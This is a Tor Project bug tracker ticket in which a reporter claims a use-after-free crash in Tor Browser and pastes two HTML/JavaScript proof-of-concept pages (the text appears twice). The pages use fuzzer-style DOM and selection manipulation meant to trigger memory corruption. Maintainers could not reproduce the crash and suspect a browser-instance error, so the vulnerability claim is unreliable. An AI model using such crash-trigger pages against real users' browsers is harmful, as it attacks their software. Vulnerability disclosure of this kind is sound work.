Opened 11 days ago

Last modified 9 days ago

#26705 needs_information project

BUG Report ! Use after Free Vulnerability

Reported by: t4rkd3vilz Owned by: tbb-team
Priority: Very High Milestone:
Component: Applications/Tor Browser Version:
Severity: Normal Keywords:
Cc: Actual Points:
Parent ID: Points:
Reviewer: Sponsor:

Description

hello,

tor browser click new tab.

a new tab open html in code :

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

and open second tab.

Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

a result: Tor browser CRASHH...

Impact
hello,

tor browser click new tab.

a new tab open html in code :

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

and open second tab.

Second tab in code:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

a result: Tor browser CRASHH...

Child Tickets

Attachments (3)

tor2.png (73.3 KB) - added by t4rkd3vilz 9 days ago.
crash senary
tor1.png (62.8 KB) - added by t4rkd3vilz 9 days ago.
crash tor 3.png (22.0 KB) - added by t4rkd3vilz 9 days ago.
result

Download all attachments as: .zip

Change History (6)

comment:1 Changed 11 days ago by Dbryrtfbcbhgf

Component: Core Tor/TorApplications/Tor Browser
Owner: set to tbb-team
Version: Tor: unspecified

comment:2 Changed 11 days ago by boklm

Status: newneeds_information

I tried this in Tor Browser 7.5.6, and 8.0a9, but this did not crash for me.

Changed 9 days ago by t4rkd3vilz

Attachment: tor2.png added

crash senary

Changed 9 days ago by t4rkd3vilz

Attachment: tor1.png added

Changed 9 days ago by t4rkd3vilz

Attachment: crash tor 3.png added

result

comment:3 Changed 9 days ago by boklm

Some questions:

  • on which OS are you seeing this issue? So far we have tried loading the 2 html pages in 2 tabs on Linux, Windows 7 and macOS 10.11 without being able to reproduce the issue.
  • In the screenshots, you seem to be loading the pages locally (with file:/// URLs). Does this issue only happen with local pages, or can you reproduce it when loading them with http?
  • In tor2.png it looks like you open the second page using the file manager. Can you reproduce the issue by copy pasting the address in the URL bar instead of using the file manager to open it? The error in crash tor 3.png looks like an error you would get if you try to run more than one instance of the browser. So the issue might be how the file manager has been configured to open new pages in Tor Browser.
Note: See TracTickets for help on using tickets.